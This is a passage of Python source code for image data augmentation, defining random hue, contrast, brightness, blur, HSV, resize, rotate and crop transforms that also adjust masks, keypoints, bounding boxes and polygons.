np.asarray(img).astype(np.float32)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n img[:, :, 0] += random.uniform(-self.delta, self.delta)\n img[:, :, 0][img[:, :, 0] > 360] -= 360\n img[:, :, 0][img[:, :, 0] < 0] += 360\n img = cv2.cvtColor(img, cv2.COLOR_HSV2RGB)\n img = np.clip(img, 0, 255)\n img = Image.fromarray(img.astype(np.uint8), mode=img_mode)\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomPerm(object):\n def __init__(self, ratio=0.5):\n self.ratio = ratio\n self.perms = ((0, 1, 2), (0, 2, 1),\n (1, 0, 2), (1, 2, 0),\n (2, 0, 1), (2, 1, 0))\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n img_mode = img.mode\n swap = self.perms[random.randint(0, len(self.perms)-1)]\n img = np.asarray(img)\n img = img[:, :, swap]\n img = Image.fromarray(img.astype(np.uint8), mode=img_mode)\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomContrast(object):\n def __init__(self, lower=0.5, upper=1.5, ratio=0.5):\n self.lower = lower\n self.upper = upper\n self.ratio = ratio\n assert self.upper >= self.lower, \"contrast upper must be >= lower.\"\n assert self.lower >= 0, \"contrast lower must be non-negative.\"\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n img_mode = img.mode\n img = np.array(img).astype(np.float32)\n img *= random.uniform(self.lower, self.upper)\n img = np.clip(img, 0, 255)\n img = Image.fromarray(img.astype(np.uint8), mode=img_mode)\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomBrightness(object):\n def __init__(self, shift_value=30, ratio=0.5):\n self.shift_value = shift_value\n self.ratio = ratio\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n img_mode = img.mode\n shift = np.random.uniform(-self.shift_value, self.shift_value, size=1)\n img = np.asarray(img).astype(np.float32)\n img[:, :, :] += shift\n img = np.around(img)\n img = np.clip(img, 0, 255)\n img = Image.fromarray(img.astype(np.uint8), mode=img_mode)\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomGaussBlur(object):\n def __init__(self, max_blur=4, ratio=0.5):\n self.max_blur = max_blur\n self.ratio = ratio\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n blur_value = np.random.uniform(0, self.max_blur)\n img = img.filter(ImageFilter.GaussianBlur(radius=blur_value))\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomHSV(object):\n \"\"\"\n Args:\n h_range (float tuple): random ratio of the hue channel,\n new_h range from h_range[0]*old_h to h_range[1]*old_h.\n s_range (float tuple): random ratio of the saturation channel,\n new_s range from s_range[0]*old_s to s_range[1]*old_s.\n v_range (int tuple): random bias of the value channel,\n new_v range from old_v-v_range to old_v+v_range.\n Notice:\n h range: 0-1\n s range: 0-1\n v range: 0-255\n \"\"\"\n def __init__(self, h_range, s_range, v_range, ratio=0.5):\n assert isinstance(h_range, (list, tuple)) and \\\n isinstance(s_range, (list, tuple)) and \\\n isinstance(v_range, (list, tuple))\n self.h_range = h_range\n self.s_range = s_range\n self.v_range = v_range\n self.ratio = ratio\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n img_mode = img.mode\n img = np.asarray(img)\n img_hsv = matplotlib.colors.rgb_to_hsv(img)\n img_h, img_s, img_v = img_hsv[:, :, 0], img_hsv[:, :, 1], img_hsv[:, :, 2]\n h_random = np.random.uniform(min(self.h_range), max(self.h_range))\n s_random = np.random.uniform(min(self.s_range), max(self.s_range))\n v_random = np.random.uniform(min(self.v_range), max(self.v_range))\n img_h = np.clip(img_h * h_random, 0, 1)\n img_s = np.clip(img_s * s_random, 0, 1)\n img_v = np.clip(img_v * v_random, 0, 255)\n img_hsv = np.stack([img_h, img_s, img_v], axis=2)\n img = matplotlib.colors.hsv_to_rgb(img_hsv)\n img = Image.fromarray(img.astype(np.uint8), mode=img_mode)\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomResizedCrop(object):\n \"\"\"Crop the given PIL Image to random size and aspect ratio.\n\n A crop of random size (default: of 0.08 to 1.0) of the original size and a random\n aspect ratio (default: of 3/4 to 4/3) of the original aspect ratio is made. This crop\n is finally resized to given size.\n This is popularly used to train the Inception networks.\n\n Args:\n size: expected output size of each edge\n scale: range of size of the origin size cropped\n ratio: range of aspect ratio of the origin aspect ratio cropped\n interpolation: Default: PIL.Image.BILINEAR\n \"\"\"\n def __init__(self, crop_size, scale_range=(0.08, 1.0), aspect_range=(3. / 4., 4. / 3.)):\n self.size = crop_size\n self.scale = scale_range\n self.ratio = aspect_range\n\n @staticmethod\n def get_params(img, scale, ratio):\n \"\"\"Get parameters for ``crop`` for a random sized crop.\n\n Args:\n img (PIL Image): Image to be cropped.\n scale (tuple): range of size of the origin size cropped\n ratio (tuple): range of aspect ratio of the origin aspect ratio cropped\n\n Returns:\n tuple: params (i, j, h, w) to be passed to ``crop`` for a random\n sized crop.\n \"\"\"\n for attempt in range(10):\n area = img.size[0] * img.size[1]\n target_area = random.uniform(*scale) * area\n aspect_ratio = random.uniform(*ratio)\n\n w = int(round(math.sqrt(target_area * aspect_ratio)))\n h = int(round(math.sqrt(target_area / aspect_ratio)))\n\n if random.random() < 0.5:\n w, h = h, w\n\n if w <= img.size[0] and h <= img.size[1]:\n i = random.randint(0, img.size[1] - h)\n j = random.randint(0, img.size[0] - w)\n return i, j, h, w\n\n # Fallback\n w = min(img.size[0], img.size[1])\n i = (img.size[1] - w) // 2\n j = (img.size[0] - w) // 2\n return i, j, w, w\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n \"\"\"\n Args:\n img (PIL Image): Image to be cropped and resized.\n\n Returns:\n PIL Image: Randomly cropped and resized image.\n \"\"\"\n assert isinstance(img, Image.Image)\n assert labelmap is None and maskmap is None and kpts is None and bboxes is None and labels is None\n i, j, h, w = self.get_params(img, self.scale, self.ratio)\n img = img.crop((j, i, j + w, i + h))\n img = img.resize(self.size, Image.BILINEAR)\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomResize(object):\n \"\"\"Resize the given numpy.ndarray to random size and aspect ratio.\n\n Args:\n scale_min: the min scale to resize.\n scale_max: the max scale to resize.\n \"\"\"\n\n def __init__(self, scale_range=(0.75, 1.25), aspect_range=(0.9, 1.1),\n target_size=None, resize_bound=None, method='random', ratio=0.5):\n self.scale_range = scale_range\n self.aspect_range = aspect_range\n self.resize_bound = resize_bound\n self.method = method\n self.ratio = ratio\n if target_size is not None:\n if isinstance(target_size, int):\n self.input_size = (target_size, target_size)\n elif isinstance(target_size, (list, tuple)) and len(target_size) == 2:\n self.input_size = target_size\n else:\n raise TypeError('Got inappropriate size arg: {}'.format(target_size))\n else:\n self.input_size = None\n\n def get_scale(self, img_size, bboxes):\n if self.method == 'random':\n scale_ratio = random.uniform(self.scale_range[0], self.scale_range[1])\n return scale_ratio\n\n elif self.method == 'focus':\n if self.input_size is not None and bboxes is not None and len(bboxes) > 0:\n bboxes = np.array(bboxes)\n border = bboxes[:, 2:] - bboxes[:, 0:2]\n scale = 0.6 / max(max(border[:, 0]) / self.input_size[0], max(border[:, 1]) / self.input_size[1])\n scale_ratio = random.uniform(self.scale_range[0], self.scale_range[1]) * scale\n return scale_ratio\n\n else:\n scale_ratio = random.uniform(self.scale_range[0], self.scale_range[1])\n return scale_ratio\n\n elif self.method == 'bound':\n scale1 = self.resize_bound[0] / min(img_size)\n scale2 = self.resize_bound[1] / max(img_size)\n scale = min(scale1, scale2)\n return scale\n\n else:\n raise NotImplementedError('Resize method {} undefined!'.format(self.method))\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n \"\"\"\n Args:\n img (Image): Image to be resized.\n maskmap (Image): Mask to be resized.\n kpt (list): keypoints to be resized.\n center: (list): center points to be resized.\n\n Returns:\n Image: Randomly resize image.\n Image: Randomly resize maskmap.\n list: Randomly resize keypoints.\n list: Randomly resize center points.\n \"\"\"\n assert isinstance(img, (Image.Image, list))\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n\n # width, height = img.size\n width, height = img.size if isinstance(img, Image.Image) else img[0].size\n if random.random() < self.ratio:\n scale_ratio = self.get_scale([width, height], bboxes)\n aspect_ratio = random.uniform(*self.aspect_range)\n w_scale_ratio = math.sqrt(aspect_ratio) * scale_ratio\n h_scale_ratio = math.sqrt(1.0 / aspect_ratio) * scale_ratio\n else:\n w_scale_ratio, h_scale_ratio = 1.0, 1.0\n\n if kpts is not None and kpts.size > 0:\n kpts[:, :, 0] *= w_scale_ratio\n kpts[:, :, 1] *= h_scale_ratio\n\n if bboxes is not None and bboxes.size > 0:\n bboxes[:, 0::2] *= w_scale_ratio\n bboxes[:, 1::2] *= h_scale_ratio\n\n if polygons is not None:\n for object_id in range(len(polygons)):\n for polygon_id in range(len(polygons[object_id])):\n polygons[object_id][polygon_id][0::2] *= w_scale_ratio\n polygons[object_id][polygon_id][1::2] *= h_scale_ratio\n\n converted_size = (int(width * w_scale_ratio), int(height * h_scale_ratio))\n\n if not isinstance(img, list):\n img = img.resize(converted_size, Image.BILINEAR)\n else:\n img = [item.resize(converted_size, Image.BILINEAR) for item in img]\n if labelmap is not None:\n labelmap = labelmap.resize(converted_size, Image.NEAREST)\n if maskmap is not None:\n maskmap = maskmap.resize(converted_size, Image.NEAREST)\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomRotate(object):\n \"\"\"Rotate the input numpy.ndarray and points to the given degree.\n\n Args:\n degree (number): Desired rotate degree.\n \"\"\"\n def __init__(self, max_degree, ratio=0.5, mean=(104, 117, 123)):\n assert isinstance(max_degree, int)\n self.max_degree = max_degree\n self.ratio = ratio\n self.mean = tuple(mean)\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n \"\"\"\n Args:\n img (Image): Image to be rotated.\n maskmap (Image): Mask to be rotated.\n kpt (np.array): Keypoints to be rotated.\n center (list): Center points to be rotated.\n\n Returns:\n Image: Rotated image.\n list: Rotated key points.\n \"\"\"\n assert isinstance(img, (Image.Image, list))\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() < self.ratio:\n rotate_degree = random.uniform(-self.max_degree, self.max_degree)\n else:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n width, height = img.size if isinstance(img, Image.Image) else img[0].size\n img_center = (width / 2.0, height / 2.0)\n rotate_mat = cv2.getRotationMatrix2D(img_center, rotate_degree, 1.0)\n cos_val = np.abs(rotate_mat[0, 0])\n sin_val = np.abs(rotate_mat[0, 1])\n new_width = int(height * sin_val + width * cos_val)\n new_height = int(height * cos_val + width * sin_val)\n rotate_mat[0, 2] += (new_width / 2.) - img_center[0]\n rotate_mat[1, 2] += (new_height / 2.) - img_center[1]\n if not isinstance(img, list):\n img_mode = img.mode\n img = np.asarray(img)\n img = cv2.warpAffine(img, rotate_mat, (new_width, new_height), borderValue=self.mean)\n img = Image.fromarray(img.astype(np.uint8), mode=img_mode)\n else:\n for i in range(len(img)):\n img_mode = img[i].mode\n img_i = np.array(img[i])\n img_i = cv2.warpAffine(img_i, rotate_mat, (new_width, new_height), borderValue=self.mean)\n img[i] = Image.fromarray(img_i.astype(np.uint8), mode=img_mode)\n\n if labelmap is not None:\n labelmap_mode = labelmap.mode\n labelmap = np.asarray(labelmap)\n labelmap = cv2.warpAffine(labelmap, rotate_mat, (new_width, new_height),\n borderValue=(255, 255, 255), flags=cv2.INTER_NEAREST)\n labelmap = Image.fromarray(labelmap.astype(np.uint8), mode=labelmap_mode)\n\n if maskmap is not None:\n maskmap_mode = maskmap.mode\n maskmap = np.asarray(maskmap)\n maskmap = cv2.warpAffine(maskmap, rotate_mat, (new_width, new_height),\n borderValue=(1, 1, 1), flags=cv2.INTER_NEAREST)\n maskmap = Image.fromarray(maskmap.astype(np.uint8), mode=maskmap_mode)\n\n if polygons is not None:\n for object_id in range(len(polygons)):\n for polygon_id in range(len(polygons[object_id])):\n for i in range(len(polygons[object_id][polygon_id]) // 2):\n x = polygons[object_id][polygon_id][i * 2]\n y = polygons[object_id][polygon_id][i * 2 + 1]\n p = np.array([x, y, 1])\n p = rotate_mat.dot(p)\n polygons[object_id][polygon_id][i * 2] = p[0]\n polygons[object_id][polygon_id][i * 2 + 1] = p[1]\n\n if kpts is not None and kpts.size > 0:\n num_objects = len(kpts)\n num_keypoints = len(kpts[0])\n for i in range(num_objects):\n for j in range(num_keypoints):\n x = kpts[i][j][0]\n y = kpts[i][j][1]\n p = np.array([x, y, 1])\n p = rotate_mat.dot(p)\n kpts[i][j][0] = p[0]\n kpts[i][j][1] = p[1]\n\n # It is not right for object detection tasks.\n if bboxes is not None and bboxes.size > 0:\n for i in range(len(bboxes)):\n bbox_temp = [bboxes[i][0], bboxes[i][1], bboxes[i][2], bboxes[i][1],\n bboxes[i][0], bboxes[i][3], bboxes[i][2], bboxes[i][3]]\n\n for node in range(4):\n x = bbox_temp[node * 2]\n y = bbox_temp[node * 2 + 1]\n p = np.array([x, y, 1])\n p = rotate_mat.dot(p)\n bbox_temp[node * 2] = p[0]\n bbox_temp[node * 2 + 1] = p[1]\n\n bboxes[i] = [min(bbox_temp[0], bbox_temp[2], bbox_temp[4], bbox_temp[6]),\n min(bbox_temp[1], bbox_temp[3], bbox_temp[5], bbox_temp[7]),\n max(bbox_temp[0], bbox_temp[2], bbox_temp[4], bbox_temp[6]),\n max(bbox_temp[1], bbox_temp[3], bbox_temp[5], bbox_temp[7])]\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomCrop(object):\n \"\"\"Crop the given numpy.ndarray and at a random location.\n\n Args:\n size (int or tuple): Desired output size of the crop.(w, h)\n \"\"\"\n def __init__(self, crop_size, ratio=0.5, method='focus', grid=None, allow_outside_center=True):\n self.ratio = ratio\n self.method = method\n self.grid = grid\n self.allow_outside_center = allow_outside_center\n if isinstance(crop_size, float):\n self.size = (crop_size, crop_size)\n elif isinstance(crop_size, collections.Iterable) and len(crop_size) == 2:\n self.size = crop_size\n else:\n raise TypeError('Got inappropriate size arg: {}'.format(crop_size))\n\n def get_lefttop(self, crop_size, img_size):\n if self.method == 'center':\n return [(img_size[0] - crop_size[0]) // 2, (img_size[1] - crop_size[1]) // 2]\n\n elif self.method == 'random':\n x = random.randint(0, img_size[0] - crop_size[0])\n y = random.randint(0, img_size[1] - crop_size[1])\n return [x, y]\n\n elif self.method == 'grid':\n grid_x = random.randint(0, self.grid[0] - 1)\n grid_y = random.randint(0, self.grid[1] - 1)\n x = grid_x * ((img_size[0] - crop_size[0]) // (self.grid[0] - 1))\n y = grid_y * ((img_size[1] - crop_size[1]) // (self.grid[1] - 1))\n return [x, y]\n\n else:\n raise NotImplementedError('Random Crop Method {} Undefined!'.format(self.method))\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n \"\"\"\n Args:\n img (Image): Image to be cropped.\n maskmap (Image): Mask to be cropped.\n kpts (np.array): keypoints to be cropped.\n bboxes (np.array): bounding boxes.\n\n Returns:\n Image: Cropped image.\n Image: Cropped maskmap.\n np.array: Cropped keypoints.\n np.ndarray: Cropped center points.\n \"\"\"\n assert isinstance(img, (Image.Image, list))\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n width, height = img.size if isinstance(img, Image.Image) else img[0].size\n target_size = [min(self.size[0], width), min(self.size[1], height)]\n offset_left, offset_up = self.get_lefttop(target_size, [width, height])\n if kpts is not None and kpts.size > 0:\n kpts[:, :, 0] -= offset_left\n kpts[:, :, 1] -= offset_up\n\n if bboxes is not None and bboxes.size > 0:\n if self.allow_outside_center:\n mask = np.ones(bboxes.shape[0], dtype=bool)\n else:\n crop_bb = np.array([offset_left, offset_up, offset_left + target_size[0], offset_up + target_size[1]])\n center = (bboxes[:, :2] + bboxes[:, 2:]) / 2\n mask = np.logical_and(crop_bb[:2] <= center, center < crop_bb[2:]).all(axis=1)\n\n bboxes[:, 0::2] -= offset_left\n bboxes[:, 1::2] -= offset_up\n bboxes[:, 0::2] = np.clip(bboxes[:, 0::2], 0, target_size[0] - 1)\n bboxes[:, 1::2] = np.clip(bboxes[:, 1::2], 0, target_size[1] - 1)\n\n mask = np.logical_and(mask, (bboxes[:, :2] < bboxes[:, 2:]).all(axis=1))\n bboxes = bboxes[mask]\n if labels is not None:\n labels = labels[mask]\n\n if polygons is not None:\n new_polygons = list()\n for object_id in range(len(polygons)):\n if mask[object_id] == 1:\n for polygon_id in range(len(polygons[object_id])):\n polygons[object_id][polygon_id][0::2] -= offset_left\n polygons[object_id][polygon_id][1::2] -= offset_up\n polygons[object_id][polygon_id][0::2] = np.clip(polygons[object_id][polygon_id][0::2],\n 0, target_size[0] - 1)\n polygons[object_id][polygon_id][1::2] = np.clip(polygons[object_id][polygon_id][1::2],\n 0, target_size[1] - 1)\n\n new_polygons.append(polygons[object_id])\n\n polygons = new_polygons\n\n if not isinstance(img, list):\n img = img.crop((offset_left, offset_up, offset_left + target_size[0], offset_up + target_size[1]))\n else:\n img = [item.crop((offset_left, offset_up,\n offset_left + target_size[0], offset_up + target_size[1])) for item in img]\n\n if maskmap is not None:\n maskmap = maskmap.crop((offset_left, offset_up, offset_left + target_size[0], offset_up + target_size[1]))\n\n if labelmap is not None:\n labelmap = labelmap.crop((offset_left, offset_up, offset_left + target_size[0], offset_up + target_size[1]))\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomFocusCrop(object):\n \"\"\"Crop the given numpy.ndarray and at a random location.\n\n Args:\n size (int or tuple): Desired output size of the crop.(w, h)\n \"\"\"\n def __init__(self, crop_size, ratio=0.5, center_jitter=None, mean=(104, 117, 123), allow_outside_center=True):\n self.ratio = ratio\n self.center_jitter = center_jitter\n self.mean = mean\n self.allow_outside_center = allow_outside_center\n if isinstance(crop_size, float):\n self.size = (crop_size, crop_size)\n elif isinstance(crop_size, collections.Iterable) and len(crop_size) == 2:\n self.size = crop_size\n else:\n raise TypeError('Got inappropriate size arg: {}'.format(crop_size))\n\n def get_center(self, img_size, bboxes):\n if bboxes is None or len(bboxes) == 0:\n if img_size[0] > self.size[0]:\n x = random.randint(self.size[0] // 2, img_size[0] - self.size[0] // 2)\n else:\n x = img_size[0] // 2\n\n if img_size[1] > self.size[1]:\n y = random.randint(self.size[1] // 2, img_size[1] - self.size[1] // 2)\n else:\n y = img_size[1] // 2\n\n return [x, y], -1\n\n else:\n border = bboxes[:, 2:] - bboxes[:, 0:2]\n area = border[:, 0] * border[:, 1]\n max_index = np.argmax(area)\n max_center = [(bboxes[max_index][0] + bboxes[max_index][2]) / 2,\n (bboxes[max_index][1] + bboxes[max_index][3]) / 2]\n\n if self.center_jitter is not None:\n jitter = random.randint(-self.center_jitter, self.center_jitter)\n max_center[0] += jitter\n jitter = random.randint(-self.center_jitter, self.center_jitter)\n max_center[1] += jitter\n\n return max_center, max_index\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n \"\"\"\n Args:\n img (Image): Image to be cropped.\n maskmap (Image): Mask to be cropped.\n kpts (np.array): keypoints to be cropped.\n bboxes (np.array): bounding boxes.\n\n Returns:\n Image: Cropped image.\n Image: Cropped maskmap.\n list: Cropped keypoints.\n list: Cropped center points.\n \"\"\"\n assert isinstance(img, Image.Image)\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n center, index = self.get_center(img.size, bboxes)\n offset_left = int(center[0] - self.size[0] // 2)\n offset_up = int(center[1] - self.size[1] // 2)\n\n if kpts is not None and kpts.size > 0:\n kpts[:, :, 0] -= offset_left\n kpts[:, :, 1] -= offset_up\n mask = np.logical_or.reduce((kpts[:, :, 0] >= self.size[0], kpts[:, :, 0] < 0,\n kpts[:, :, 1] >= self.size[1], kpts[:, :, 1] < 0))\n kpts[mask == 1, 2] = -1\n\n if bboxes is not None and bboxes.size > 0:\n if self.allow_outside_center:\n mask = np.ones(bboxes.shape[0], dtype=bool)\n else:\n crop_bb = np.array([offset_left, offset_up, offset_left + self.size[0], offset_up + self.size[1]])\n center = (bboxes[:, :2] + bboxes[:, 2:]) / 2\n mask = np.logical_and(crop_bb[:2] <= center, center < crop_bb[2:]).all(axis=1)\n\n bboxes[:, 0::2] -= offset_left\n bboxes[:, 1::2] -= offset_up\n bboxes[:, 0::2] = np.clip(bboxes[:, 0::2], 0, self.size[0] - 1)\n bboxes[:, 1::2] = np.clip(bboxes[:, 1::2], 0, self.size[1] - 1)\n\n mask = np.logical_and(mask, (bboxes[:, :2] < bboxes[:, 2:]).all(axis=1))\n bboxes = bboxes[mask]\n if labels is not None:\n labels = labels[mask]\n\n if polygons is not None:\n new_polygons = list()\n for object_id in range(len(polygons)):\n if mask[object_id] == 1:\n for polygon_id in range(len(polygons[object_id])):\n polygons[object_id][polygon_id][0::2] -= offset_left\n polygons[object_id][polygon_id][1::2] -= offset_up\n polygons[object_id][polygon_id][0::2] = np.clip(polygons[object_id][polygon_id][0::2],\n 0, self.size[0] - 1)\n polygons[object_id][polygon_id][1::2] = np.clip(polygons[object_id][polygon_id][1::2],\n 0, self.size[1] - 1)\n\n new_polygons.append(polygons[object_id])\n\n polygons = new_polygons\n\n w, h = img.size\n img = ImageOps.expand(img,\n border=(-offset_left, -offset_up,\n self.size[0] + offset_left - w, self.size[1] + offset_up - h),\n fill=tuple(self.mean))\n img = img.crop((0, 0, self.size[0], self.size[1]))\n\n if maskmap is not None:\n maskmap = ImageOps.expand(maskmap,\n border=(-offset_left, -offset_up,\n self.size[0] + offset_left - w, self.size[1] + offset_up - h), fill=1)\n maskmap = maskmap.crop((0, 0, self.size[0], self.size[1]))\n\n if labelmap is not None:\n labelmap = ImageOps.expand(labelmap, border=(-offset_left, -offset_up,\n self.size[0] + offset_left - w,\n self.size[1] + offset_up - h), fill=255)\n labelmap = labelmap.crop((0, 0, self.size[0], self.size[1]))\n\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n\nclass RandomDetCrop(object):\n \"\"\"Crop\n Arguments:\n img (Image): the image being input during training\n boxes (Tensor): the original bounding boxes in pt form\n labels (Tensor): the class labels for each bbox\n mode (float tuple): the min and max jaccard overlaps\n Return:\n (img, boxes, classes)\n img (Image): the cropped image\n boxes (Tensor): the adjusted bounding boxes in pt form\n labels (Tensor): the class labels for each bbox\n \"\"\"\n def __init__(self, ratio=0.5):\n self.ratio = ratio\n self.sample_options = (\n # using entire original input image\n None,\n # sample a patch s.t. MIN jaccard w/ obj in .1,.3,.4,.7,.9\n (0.1, None),\n (0.3, None),\n (0.5, None),\n (0.7, None),\n (0.9, None),\n # randomly sample a patch\n (None, None),\n )\n\n @staticmethod\n def intersect(box_a, box_b):\n max_xy = np.minimum(box_a[:, 2:], box_b[2:])\n min_xy = np.maximum(box_a[:, :2], box_b[:2])\n inter = np.clip((max_xy - min_xy), a_min=0, a_max=np.inf)\n return inter[:, 0] * inter[:, 1]\n\n @staticmethod\n def jaccard_numpy(box_a, box_b):\n \"\"\"Compute the jaccard overlap of two sets of boxes. The jaccard overlap\n is simply the intersection over union of two boxes.\n E.g.:\n A ∩ B / A ∪ B = A ∩ B / (area(A) + area(B) - A ∩ B)\n Args:\n box_a: Multiple bounding boxes, Shape: [num_boxes,4]\n box_b: Single bounding box, Shape: [4]\n Return:\n jaccard overlap: Shape: [box_a.shape[0], box_a.shape[1]]\n \"\"\"\n inter = RandomDetCrop.intersect(box_a, box_b)\n area_a = ((box_a[:, 2] - box_a[:, 0]) *\n (box_a[:, 3] - box_a[:, 1])) # [A,B]\n area_b = ((box_b[2] - box_b[0]) *\n (box_b[3] - box_b[1])) # [A,B]\n union = area_a + area_b - inter\n return inter / union # [A,B]\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, Image.Image)\n assert labelmap is None and maskmap is None and kpts is None and polygons is None\n assert bboxes is not None and labels is not None\n\n if random.random() > self.ratio:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n width, height = img.size\n while True:\n # randomly choose a mode\n mode = random.choice(self.sample_options)\n if mode is None or bboxes.size == 0:\n return img, labelmap, maskmap, kpts, bboxes, labels, polygons\n\n min_iou, max_iou = mode\n if min_iou is None:\n min_iou = float('-inf')\n if max_iou is None:\n max_iou = float('inf')\n\n # max trails (50)\n for _ in range(50):\n scale = random.uniform(0.3, 1.)\n min_ratio = max(0.5, scale * scale)\n max_ratio = min(2.0, 1. / scale / scale)\n ratio = math.sqrt(random.uniform(min_ratio, max_ratio))\n w = int(scale * ratio * width)\n h = int((scale / ratio) * height)\n left = random.randint(0, width - w)\n top = random.randint(0, height - h)\n # convert to integer rect x1,y1,x2,y2\n rect = np.array([int(left), int(top), int(left+w), int(top+h)])\n # calculate IoU (jaccard overlap) b/t the cropped and gt boxes\n overlap = self.jaccard_numpy(bboxes, rect)\n # is min and max overlap constraint satisfied? if not try again\n if overlap.min() < min_iou or max_iou < overlap.max():\n continue\n\n # keep overlap with gt box IF center in sampled patch\n centers = (bboxes[:, :2] + bboxes[:, 2:]) / 2.0\n # mask in all gt boxes that above and to the left of centers\n m1 = (rect[0] < centers[:, 0]) * (rect[1] < centers[:, 1])\n # mask in all gt boxes that under and to the right of centers\n m2 = (rect[2] > centers[:, 0]) * (rect[3] > centers[:, 1])\n # mask in that both m1 and m2 are true\n mask = m1 * m2\n # have any valid boxes? try again if not\n if not mask.any():\n continue\n\n # take only matching gt boxes\n current_boxes = bboxes[mask, :].copy()\n # cut the crop from the image\n current_img = img.crop((left, top, left + w, top + h))\n # take only matching gt labels\n current_labels = labels[mask]\n # should we use the box left and top corner or the crop's\n current_boxes[:, :2] = np.maximum(current_boxes[:, :2], rect[:2])\n # adjust to crop (by substracting crop's left,top)\n current_boxes[:, :2] -= rect[:2]\n current_boxes[:, 2:] = np.minimum(current_boxes[:, 2:], rect[2:])\n # adjust to crop (by substracting crop's left,top)\n current_boxes[:, 2:] -= rect[:2]\n return current_img, labelmap, maskmap, kpts, current_boxes, current_labels, polygons\n\n\nclass Resize(object):\n def __init__(self, target_size=None, min_side_length=None, max_side_length=None):\n self.target_size = target_size\n self.min_side_length = min_side_length\n self.max_side_length = max_side_length\n\n def __call__(self, img, labelmap=None, maskmap=None, kpts=None, bboxes=None, labels=None, polygons=None):\n assert isinstance(img, (Image.Image, list))\n assert labelmap is None or isinstance(labelmap, Image.Image)\n assert maskmap is None or isinstance(maskmap, Image.Image)\n\n # width, height = img.size\n width, height = img.size if isinstance(img, Image.Image) else img[0].size\n if self.target_size is not None:\n w_scale_ratio = self.target_size[0] / width\n h_scale_ratio = self.target_size[1] / height\n\n elif self.min_side_length is not None and self.max_side_length is None:\n scale_ratio = self.min_side_length / min(width, height)\n w_scale_ratio, h_scale_ratio = scale_ratio, scale_ratio\n\n elif self.min_side_length is None and self.max_side_length is not None:\n scale_ratio = self.max_side_length / max(width, height)\n w_scale_ratio, h_scale_ratio = scale_ratio, scale_ratio\n\n else:\n scale1 = self.min_side_length / min(width, height)\n scale2 = self.max_side_length / max(width, height)\n w_scale_ratio, h_scale_ratio = min(scale1, scale2), min(scale1, scale2)\n\n target_size = [int(round(width * w_scale_ratio)), int(round(height * h_scale_ratio))]\n if kpts is not None and kpts.size > 0:\n kpts[:, :, 0] *= w_scale_ratio\n kpts[:, :, 1] *= h_scale_ratio\n\n if bboxes is not None and bboxes.size > 0:\n bboxes[:, 0::2] *= w_scale_ratio\n bboxes[:, 1::2] *= h_scale_ratio\n\n if polygons is not None:\n for object_id in range(len(polygons)):\n for polygon_id in range(len(polygons[object_id])):\n polygons[object_id][polygon_id][0::2] *= w_scale_ratio\n polygons[object_id][polygon_id][1::2] *= h_scale_ratio\n\n if not isinstance(img, list):\n img = 